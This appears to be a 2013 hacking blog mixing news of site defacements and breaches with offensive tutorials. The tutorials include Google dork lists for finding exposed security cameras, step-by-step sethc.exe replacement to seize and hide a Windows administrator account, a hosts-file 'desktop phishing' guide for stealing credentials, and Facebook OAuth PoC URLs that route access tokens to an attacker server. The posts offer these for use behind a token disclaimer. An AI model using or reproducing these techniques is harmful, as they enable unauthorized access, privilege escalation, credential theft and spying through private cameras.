Sunday, March 31, 2013

ECP website defaced by Indian hacker


The cyber attack on ECP’s website is being discussed across various internet forums with people complaining about being unable to visit the site.
KARACHI / ISLAMABAD: The Election Commission of Pakistan’s website was reportedly attacked by an Indian hacker on Friday. The website is currently down.
The attacker has defaced the home page and has possibly compromised its availability to visitors, according to a cyber expert.
The cyber attack on ECP’s website is being discussed across various internet forums with people complaining about being unable to visit the site. The attack came at a time when the traffic on the website increased ahead of the general elections.
As the cyber attack entered its second day on Saturday, the election commission decided to shift its website on another server, reported Geo News.
According to the report, the ECP has stated that all its data is secure despite the attack and the website would be restored after being shifted to another server. Sources also told Geo Newsthat the nomination papers of candidates will be uploaded on the website within the next few days.
The hacker, who identified himself as NIGh7 F0x, seemed to have hacked the website first then defaced its homepage and eventually compromised its availability, according to Rafay Baloch, a professional white hat – the term used for hackers who, against quick paybacks, assist world’s leading websites against possible cyber attacks by exposing their vulnerabilities.
The availability of any site is usually compromised through a distributed denial-of-service (DDoS) attack but this is too early to say if it was one, Baloch said. The other possibility could be the impact of the Spamhaus attack, the largest DDoS attack in the world’s history that has mainly affected North America and Europe and slowed down internet globally.
The Spamhaus attack could also compromise the availability of ECP’s website, Baloch said, because its host server is in the US.
The official government sites are at risk of such attacks because their host server PKNIC is vulnerable to basic-level cyber attacks, Baloch added. PKNIC is a shared registry system that manages the .pk domain name space (DNS) for Pakistani websites.
Indian black hats are targeting Pakistani websites almost on a daily basis with the Federal Investigation Agency being aware of the issue, according to Baloch.
Despite being attacked twice this year, PKNIC has not fixed those vulnerabilities, Baloch said.
ECP to shift website to new server
The Election Commission of Pakistan on Saturday acknowledged that its website had been hacked and said that it would be restored soon.
A spokesperson of ECP said that the authority has decided to shift its website on to another server and to employ enhanced security features.
“ECP’s website remained out of reach under a deliberate strategy to avoid loss of data and ensure security,” he said.
To a question, he said all the data of the Election Commission on the website was safe.
Nomination papers of the candidates would be uploaded on the website within next few days, he added.

How Security Camera's Are Being Hacked by GOOGLE


Hai guys today i am gonna tell you briefly about security camera hacking” How they are hacked using Google”
Disclaimer : Only for Education Purposes.
Guys you can have access in the security camera through out the world via google uncle … i call google as uncle bcz i do about 80% of my work through it …

1rst of all u have to use the IP of that country whose security camera you wanna hack bcz uncle google shows you results near by your location too

1st of all u open uncle google (www.google.com)
and type in search bar the codes wich i am going to give below !!
1st of all i am going to teach you guys about the unprotected cams of axis co. these cams are mostly developed by axis co. and there software will be obiviously named and linked by the name of axis
here are some  codes about axis cams
*inurl:indexFrame.shtml “Axis Video Server”
*intitle:Live View /- AXIS
*inurl:/view.shtml intitle:”Live View / – AXIS” |
*inurl:axis-cgi/jpg
*inurl:axis-cgi/mjpg (motion-JPEG)
*ntitle:”Live View / – AXIS”
*intitle:”Live View / – AXIS 206M”
*intitle:”Live View / – AXIS 206W”
*intitle:”Live View / – AXIS 210″
*inurl:indexFrame.shtml Axis
screenshot EXAMPLE!!
TYPE THE CODE IN SEARCH BAR



NOW SEE THE SEARCH RESULTS


NOW OPEN THE RESULT AN EXAMPLE IS BELOW


NOW I AM GOING TO TEACH YOU GUYS ABOUT THE CAM HACK OF FAMOUS AND WELL KNOWN CO> NAMED AS SOnIC .. HERE ARE SOME CODES FOR THE CAM OF SONIC>>
*intitle:”snc-rz30 home”
*intitle:snc-z20 inurl:home/
*intitle:snc-cs3
*intitle:snc-rz30 inurl:home/
*intitle:”sony network camera snc-p1″
*intitle:”sony network camera snc-m1
usually these sonic cams are secure and you have to BYPASS the security in my next post i will tell you how to by pass security!!

NOW I AM GOING TO GIVE YOU SUCH MORE CODES

*inurl:”viewerframe?mode=motion”
*inurl:LvAppl intitle:liveapplet
*inurl:view/view.shtml^
*inurl:ViewerFrame?Mode=
*inurl:ViewerFrame?Mode=Refresh
*inurl:view/indexFrame.shtml
*inurl:view/index.shtml
*inurl:view/view.shtml liveapplet
*intitle:”live view” intitle:axis
*intitle:liveapplet
*allintitle:”Network Camera NetworkCamera”
*intitle:liveapplet inurl:LvAppl
*intitle:”EvoCam”
*inurl:”webcam.html”
*intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
*intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
*intitle:”Live View / – AXIS 210″
*inurl:indexFrame.shtml Axis
*inurl:”MultiCameraFrame?Mode=Motion”
*intitle:start
*inurl:cgistart
*intitle:”WJ-NT104 Main Page”
*intext:”MOBOTIX M1″
*intext:”Open Menu”
*intext:”MOBOTIX M10″ intext:”Open Menu”
*intext:”MOBOTIX D10″
*intext:”Open Menu”
*intitle:”Toshiba Network Camera” user login
*intitle:”netcam live image”
*intitle:”i-Catcher Console – Web Monitor”
YOU CAN USE THESE VARIOUS CODES IN UNCLE GOOGLE SEARCH BAR

Wednesday, March 20, 2013

Hack administrators password through guest login



Learn to hack administrators password through guest login
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on...

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.


Procedure To Hack windows XP administrator Password

Method 1 (Change Admin Password)

Here is how to do that -

1.Go to C:/windows/system32

2.Copy cmd.exe and paste it on desktop

3.Rename cmd.exe to sethc.exe

4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.

6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

7.Now type “ NET USER ADMINISTRATOR aaa" where “aaa" can be any password you like and press enter.

8.You will see “ The Command completed successfully" and then exit the command prompt and login into
administrator with your new password.

9.Congrats You have hacked admin through guest account.
Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where " How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key





HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList


Here create a new "
 DWORD value", write its name as the “How to hack" (the username that you entered in the previous step),now you can live with your admin account forever :)
Note:For the ones that are having problems with step one: What I would do because you do not have write access to the directory you can use a live version of Linux. Copy the cmd.exe to a flash drive. Boot into Linux and copy the cmd.exe to the file that needs to be replaced. In Linux you can bypass those read/write permissions.

Wednesday, March 13, 2013

facebook-hacking-accounts-using-another OAuth Vulnerability

facebook hacking
Remember the last OAuth Flaw in Facebook, that allow an attacker to hijack any account without victim's interaction with any Facebook Application, was reported by white hat Hacker 'Nir Goldshlager'. After that Facebook security team fixed that issue using some minor changes.
Yesterday Goldshlager once again pwn Facebook OAuth mechanism by bypassing all those minor changes done by Facebook Team. He explains the complete Saga of hunting Facebook bug in a blog post.

In recent discovered technique hacker found that next parameter allow facebook.facebook.com domain as a valid option and multiple hash signs is now enough to bypass Regex Protection.

He use facebook.com/l.php file (used by Facebook to redirect users to external links) to redirect victims to his malicious Facebook application and then to his own server for storing token values, where tokens are the alternate access to any Facebook account without password. 
warnning
But a warning message while redirecting ruin the show ! No worries, he found that 5 bytes of data in redirection URL is able to bypass this warning message.

Example:  https://www.facebook.com/l/goldy;touch.facebook.com/apps/sdfsdsdsgs (where 'goldy' is the 5 byte of data used).

Now at the last step, He Redirect the victim to external websites located in files.nirgoldshlager.com (attacker server) via malicious Facebook app created by him and victim's access_token will be logged there. So here we have the final POC that can hack any Facebook account by exploiting another Facebook OAuth bug.

For all browsers:
https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token

For Firefox browser:
https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1

This bug was also reported to Facebook Security Team last week by Nir Goldshlager and patched now, if you are a hacker, we expect YOU to hack it again !

Celebrities Hacked and Doxed ! (Exclusive:Hack analysis)



The private details of many Celebrity's have  been leaked on a website :" http://www.exposed.su/ (Currently Going in and out of service)"

This is the list of celebrities exposed: Michelle Obama, Kim KardashianJoe BidenRobert Mueller (FBI Director)Hillary ClintonEric Holder (U.S. Attorney General)Charlie Beck (LAPD Chief)Mel GibsonAshton KutcherJay ZBeyonceParis Hilton,Britney SpearsSarah PalinHulk HoganDonald TrumpArnold SchwarzeneggerAl GoreKanye WestKris JennerStacia Hylton (U.S. Marshals Director)Mitt RomneyTiger Woods

When this site went viral online and gained lots of media attention the FBI got involved and is now investigating.

Data seems to be from credit reporting agency's TransUnion, Experian and Equifax. All of them admitted they were compromised.

TransUnion, Equifax and Experian have a common website called annualcreditreport.com, where customers can get a free copy of their credit report by entering personal information – such as address, social security number and date of birth –, and by answering a few multiple-choice questions.

“What it appears happened is that personal identifiable information was evidently accessed or somehow obtained by the fraudsters who therefore were able to go into annualcreditreport.com and get some pieces of information on some individuals,” Equifax representatives told Ars Technica.

Here is an exclusive analysis of the site:

The website is running behind Cloudflare (CDN). Using Cloudflare has a lot of advantages .

  • It hides the actual IP address of the site thus it will slow down attempts to trace and take down the original server.
  • Keeps the site content on cache even if it is taken down by DDOS etc.  
  • Even a small server will be able to handle lots of traffic.
Note: Cloudflare was also used by the infamous "Lulzsec" before they were shutdown

The hacker seems to be a fan of the TV series "Dexter" which is about "A likeable Miami police forensics expert who moonlights as a serial killer of criminals who he believes have escaped justice" .

First the Quote on the main page "If you believe that God makes miracles, you have to wonder if Satan has a few up his sleeve"

It is from the same TV show (Episode 12: "The British Invasion")

Second the background music embedded in the site links to : (Music from the TV show) https://www.youtube.com/watch?v=e2xxizpHuoo

The website also does not contain any images hosted within itself . All the images are taken from other sites that have already hosted them.

The use of  .su domain seems be an diversion to try to shift the attention to Russian hackers.

Whois data:

domain:        EXPOSED.SU
nserver:       dave.ns.cloudflare.com.
nserver:       fay.ns.cloudflare.com.
state:         REGISTERED, DELEGATED
person:        Private Person
e-mail:        exposed@allperson.ru
registrar:     REGTIME-REG-FID
created:       2013.03.06
paid-till:      2014.03.06
free-date:     2014.04.08
source:        TCI

The some of the pages also have youtube videos embedded in them (Most of them have something to do with the person exposed in the page)

Michelle Obama -- https://www.youtube.com/watch?v=rhN7SG-H-3k

Robert Mueller -- https://www.youtube.com/watch?v=ANeWYnArWXk

Charles Beck    -- https://www.youtube.com/watch?v=1M8vei3L0L8

Paris Hilton      -- https://www.youtube.com/watch?v=srP5twK-9Dw

Britney Spears  -- https://www.youtube.com/watch?v=kHmvkRoEowc

Donald Trump  -- https://www.youtube.com/watch?v=WD729yIKskU

Arnold Schwarzenegger -- (Broken Link in site) 

Mitt Romey -- (Broken Link in site) https://www.youtube.com/watch?v=DrR4G5HHPxY (recovered)

Though the attack is very well planned the website itself seems be done in a hurry. And there seems to be no "pattern" to the hacks except that all of the victims are celebrities.

Note: Will update this post if I find anything else.

What is Firewall -Introduction to Firewalls


Introduction to firewalls
   When you use internet in your college/school/offfice , You may not be access some websites, right? Do you know how they block those websites? They use firewalls for block websites. Firewall prevent the system from hackers attack. Lets us what is firewall.

What is Firewall?
     Firewall is working like a security guard standing outside the office. Usually, What the security guard do? He will allow those who has identity card and block those who has not the identity card. Right? Likewise, The firewall will block unauthorized access to the system.
Firewall may be a software or hardware. It will work based on the set of rules defined by the administrator. Using Firewall administrator can block certain website from being accessed.
  • All traffic from inside and outside of the network must pass through the firewall.
  • Only authorized trafic will be allowed to pass (based on the set of rules)


Types of Fire Walls
  •  Packet Filtering
  •  Appliction level gate way
  •  Circuit level gate way.

Packet Filtering (Network Layer)
A packet filtering router applies a set of rules to each incoming IP packet and then forwards or discards the packets. Router is configured such that it can filter incoming and outgoing packets. The packets will filtered based on the source and destination IP address.
IP spoofing attack is possible in this packet filtering. IP spoofing can be achieved by changing the source IP address of packets.
Stateful Inspection Firewalls
A stateful inspection packet filters tightens the rules of TCP traffic by creating a state table of out bound TCP connection. If the packet matches with existing connection based on the state table, it will be allowed. If it does not match, It will be evaluted according to the rule set for new connections.


Aplictaion Level Gateway
Application level gateway is also known as proxy server. The user communicate with the gateway using application layer of TCP/IP stack. The gateway asks the user for the name of the remote host to be connected. When the user enters valid user ID, gateway will give access to the remote application. This will block the malicious activity and correct the application behavior. This will ensure the safety of company.
More secure than packet filtering. Easy to log and audit all incoming traffic at the application level. Application-level filtering may include protection against spam and viruses as well, and be able to block undesirable Web sites based on content rather than just their IP address

Circuit Level Gateway
The circuit level gateway works at session layer of OSI model. Monitor TCP handshaking between packets to make sure a session is legitimate. Traffic is filtered based on the session rules. Circuit-level firewalls hide the network itself from the outside, which is useful for denying access to intruders. But they don't filter individual packets. This firewall is used when the administrator trusts internal users.

Why Firewall?
  •  Firewall block unauthorized users, prohibits vulnerable services from entering or leaving the network.
  • Protection from IP spoofing and routing attacks.
  •  Protection against Remote login, Trojan backdoors, Session hijacking, cookie stealing,etc.
Limitation of Firewalls
  • The fiewall cannot protect against attacks that by pass the firewall.
  • The firewall does not protect against internal threats
  • The firewall cannot protect against the transfer of virus infected progams (or) files. It would be impossible for the firewall to scan all incoming files, emails for viruses.

Sunday, March 10, 2013

Indian Cyb3r Devils Targeted UK: Hacked and defaced more than 50 sites

Indian hacker group known as "Indian cyber Devils" has hacked and defaced around 50 United Kingdom sites.

At the time of writing, we are still able to the defacement page. A simple defacement with some background music. Hacker didn't left any special message in this defacement message.

However according to the available sources they defaced uk site due old memories of freedom and all, hacker said.




List of defaced sites:
northbankspares.co.uk
airporttransferswarrington.net
airconditioningreports.co.uk
centrallancashire.com
waterandoil.co.uk
absolute-right.com
airconreports.co.uk
absoluteright.com
astleyfitness.co.uk
bebe2.co.uk
centrallancscity.org.uk
chorleyceramics.co.uk
epcpreston.biz
estateagentmanchester.org.uk
highcliffe-resthome.co.uk
newshamwariproject.co.uk
theworst.co.uk
tobebeautiful.co.uk
sharrocks.com
polybarrow.com
openhouseestateagents.co.uk
hrate.co.uk
greenpea.biz
estateagentleicester.org.uk
employ-claims.co.uk
choicelocations.info
bebe1.info
john-shaw.info
makeupbymus.com
bebe1.info
facecrewuk.co.uk
lancashirecricket.org
energy-assessor.biz

Pakistani Army and Government of Pakistan sites hacked by Indian Hacker

An Indian Hacker with online handle "Godzilla" has claimed to have breached the Pakistan Army(pakistanarmy.gov.pk) and the main Government websites(pakistan.gov.pk).

In a screenshot given to EHN, the hacker showed that he gained access to admin panel of  HILAL MAGZINE page maintained by Pakistan Army as Administrator.


Admin panel of Pakistan Army

The hacker also claimed to have crashed a proxy used by Pakistan Government websites for encrypting the URL.

At the time of writing, the main page shows the following error message: "Error 404: Initialization of one or more services failed. ".

" U thought that the proxy would stop us. Dont play with proxy if u dont know how to configure it." The hacker said.

Thursday, March 7, 2013

Desktop Phishing Tutorial - The Art of Phishing

phishing is another type of Phishing. In desktop phishing hackers change your Windows/System32/drivers/etc/hosts file, this file controls the internet browsing in your PC

 Difference between phishing and desktop phishing is as follows.

In phishing

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.
2.Victim enters his credentials in fake login page that goes to attacker.
3. Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by
looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing

1. Attacker sends an executable file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types the domain name of orignal/genuine website and is taken to our fake login page.
But the domain name remains the same as typed by victim
and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.


What is Hosts File ?

The hosts file is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\, Whenever we visit any website, say www.anything.com , an query is sent to Domain Name Server(DNS) to look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.



What is the attack ?
 
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused.
We need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page.Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.


Steps to perform attack 

1. Host phishing page on your computer.
Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.

Download the wamp or xampp.


  • Copy your phishing page and paste it in the WWW directory in wamp, the default path is "C:\Wamp\WWW
  • Run Wamp server on your pc
  • Right click the wamp icon in the system tray and select Start all services, Visit your public IP address and you must see your phishing page

2.Modify Hosts file.
If you dont have physical access to victim's computer. Then copy your hosts file and paste anywhere.
Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be take to website hosted on IP 'xxx.xxx.xxx.xxx'.

Replace it with your public IP.
 
3. Compress hosts file such that when victim opens it, it automatically gets copied to default
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.







The you can bind this file with any exe using a binder or directly give it to victim. He/she is supposed to click it
and you are done .

Limitation of attack
 
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and
connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.


Countermeasures:-
 
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in
web browser. Check the protocol whether it is "http" or "https" . https is secure,

Wednesday, March 6, 2013

Multiple Venezuela Government sites hacked by Hmei7


The Indonesian top defacer, Hmei7 continuing his mass defacement journey.  Today, he managed to breach multiple Venezuela Government websites.

The hacked Venezuela government websites : The Mayoralty Salias(alcaldialossalias.gob.ve), SITSSA - Integral System of Surface Transport SA (sitssa.gob.ve), SOGAMPI.gob.ve.

As usual, the hacker simply uploaded a x.txt file in the hacked site instead of defacing the main page. The defacement page has a simple message "hacked by hmei7".

The defacement pages:
alcaldialossalias.gob.ve/tmp/x.gif
www.sitssa.gob.ve/x.txt
www.sogampi.gob.ve/x.txt

Earlier this year, the hacker defaced more than 5000 websites with in two or three days and uploaded the x.txt file.

5,000+ sites hacked in 2 days by Indonesian Top Hacker Hmei7


Indonesian Top Hacker named "Hmei7" , known for Mass Defacements, has claimed to have defaced more than 5000 websites in two days(31 Dec 2012 and 1 Jan 2013).

So far , he hacked lot of high profile website including IBM, Microsoft, SIEMENS, AVG, Foxconn. He also defaced thousands of Government websites belong to different countries.

The hacker is not the person who deface the main page of the site.  He just upload a file named "x.txt" or "x.html" in the hacked website.

Recently, he hacked Government websites from China(ga.10.gov.cn/x.htm), Pakistani government site(www.nferoze.gos.pk),Government of Bolivia (cominabol.minedu.gob.bo/x.txt), Government of Greece, Government of Thailand, Government of Indonesia.

He also hacked multiple Madagascar Government sites including Ministry of Agriculture(agriculture.gov.mg/x.txt) ,Ministry of Commerce (commerce.gov.mg/x.txt), mct.gov.mg, egouvernance.gov.mg.

The Full list of Hacked sites :
www.zone-h.org/archive/special=1/notifier=Hmei7

Security Flaw in Samsung allow hackers to bypass Android Lock screen

A Security flaw in the Samsung phones allows hacker to bypass the lock screen and launch apps and dial phone numbers on a locked device. The vulnerability has been discovered by a mobile enthusiast Terence Eden.

To exploit this security flaw, the hacker should activate the screen and press Emergency Call. Then,  Press the "ICE" button on the bottom left and hold down physical home key for a few seconds and then release. Now, you can access the Home screen and launch any app or widget.

Researcher has tested this vulnerability against Galaxy Note II N7100 running 4.1.2.

"This attack works against Pattern Lock, PIN, Password, and Face Unlock. There is no way to secure your phone against your home screen being accessed." Eden said in his blog post.

The researcher says he tried to contact Samsung regarding this vulnerability but there is no proper response from their side.

Saturday, March 2, 2013

XSS VULNEARBILITY IN KOTAK WEBSITE

HELLO FRIENDS
TODAY A GREAT DAY TO ME BECAUSE I FOUND XSS VULNERABILITY IN KOTAK WEBSITE

http://www.kotaksecurities.com/home/index.html


I COMPLAINED TO THEIR ABOUT VULNERABILITY



XSS VULNERABILITY IN INDANEGAS ONLINE BOOKING PORTAL

HELLO 2 ALL

TODAY I WILL SHARE A NEWS ABOUT XSS VULNERABILITY FOUND BY ME IN INDANE GAS PORTAL WEBSITE  YESTERDAY

THE VULNERABILITY IS VERY SERIOUS ONE BECAUSE BY THIS HACKERS CAN GET LOGIN CREDENTIALS WHEN HACKER INJECT MALICIOUS CODE IN TO WEBSITE


I COMPLINED TO THEM ABOUT THIS VULNERABILITY....

IF YOU LIKE POST LEAVE A COMMENT

Hackers compromised cPanel's proxy server used by Technical Analysts



cPanel announced that one of the cPanel proxy servers which is used by their Technical analysts for accessing customer servers has been compromised by hackers.

According to their forum post, the hacker compromised proxy machine by compromising a single workstation used by one of our Technical Analysts.

The company said "only a small group of our Technical Analysts uses this particular machine for logins".

The company also claimed that they found no evidence that any sensitive customer data was exposed and there is no evidence that the actual database was compromised.

cPanel restructured the process used to access customer server to "reduce the risk" of this type of security breach.